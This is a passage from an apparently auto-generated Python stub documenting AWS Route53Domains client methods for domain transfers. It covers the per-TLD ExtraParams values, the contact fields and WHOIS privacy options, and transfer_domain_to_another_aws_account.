Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type PrivacyProtectAdminContact: boolean
:param PrivacyProtectAdminContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.\nDefault: true\n
:type PrivacyProtectRegistrantContact: boolean
:param PrivacyProtectRegistrantContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (domain owner).\nDefault: true\n
:type PrivacyProtectTechContact: boolean
:param PrivacyProtectTechContact: Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ('who is') queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.\nDefault: true\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The TransferDomain response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.DomainLimitExceeded
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
:returns:
DomainName (string) -- [REQUIRED]
The name of the domain that you want to transfer to Route 53. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .
The domain name can contain only the following characters:
Letters a through z. Domain names are not case sensitive.
Numbers 0 through 9.
Hyphen (-). You can\'t specify a hyphen at the beginning or end of a label.
Period (.) to separate the labels in the name, such as the . in example.com .
IdnLangCode (string) -- Reserved for future use.
DurationInYears (integer) -- [REQUIRED]
The number of years that you want to register the domain for. Domains are registered for a minimum of one year. The maximum period depends on the top-level domain.
Default: 1
Nameservers (list) -- Contains details for the host and glue IP addresses.
(dict) --Nameserver includes the following elements.
Name (string) -- [REQUIRED]The fully qualified host name of the name server.
Constraint: Maximum 255 characters
GlueIps (list) --Glue IP address of a name server entry. Glue IP addresses are required only when the name of the name server is a subdomain of the domain. For example, if your domain is example.com and the name server for the domain is ns.example.com, you need to specify the IP address for ns.example.com.
Constraints: The list can contain only one IPv4 and one IPv6 address.
(string) --
AuthCode (string) -- The authorization code for the domain. You get this value from the current registrar.
AutoRenew (boolean) -- Indicates whether the domain will be automatically renewed (true) or not (false). Autorenewal only takes effect after the account is charged.
Default: true
AdminContact (dict) -- [REQUIRED]
Provides detailed contact information.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
RegistrantContact (dict) -- [REQUIRED]
Provides detailed contact information.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
TechContact (dict) -- [REQUIRED]
Provides detailed contact information.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code>]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limit\xc3\xa9e)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA.se
BIRTH_COUNTRY
SE_ID_NUMBER.sg
SG_ID_NUMBER.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
PrivacyProtectAdminContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.
Default: true
PrivacyProtectRegistrantContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (domain owner).
Default: true
PrivacyProtectTechContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.
Default: true
"""
pass
def transfer_domain_to_another_aws_account(DomainName=None, AccountId=None):
"""
Transfers a domain from the current AWS account to another AWS account. Note the following:
Use either ListOperations or GetOperationDetail to determine whether the operation succeeded. GetOperationDetail provides additional information, for example, Domain Transfer from Aws Account 111122223333 has been cancelled .
See also: AWS API Documentation
Exceptions
:example: response = client.transfer_domain_to_another_aws_account(
DomainName='string',
AccountId='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to transfer from the current AWS account to another account.\n
:type AccountId: string
:param AccountId: [REQUIRED]\nThe account ID of the AWS account that you want to transfer the domain to, for example, 111122223333 .\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string',
'Password': 'string'
}
Response Structure
(dict) --
The TransferDomainToAnotherAwsAccount response includes the following elements.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Password (string) --
To finish transferring a domain to another AWS account, the account that the domain is being transferred to must submit an AcceptDomainTransferFromAnotherAwsAccount request. The request must include the value of the Password element that was returned in the TransferDomainToAnotherAwsAccount response.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.DuplicateRequest
:return: {
'OperationId': 'string',
'Password': 'string'
}
:returns:
DomainName (string) -- [REQUIRED]
The name of the domain that you want to transfer from the current AWS account to another account.
AccountId (string) -- [REQUIRED]
The account ID of the AWS account that you want to transfer the domain to, for example, 111122223333 .
"""
pass
def update_domain_contact(DomainName=None, AdminContact=None, RegistrantContact=None, TechContact=None):
"""
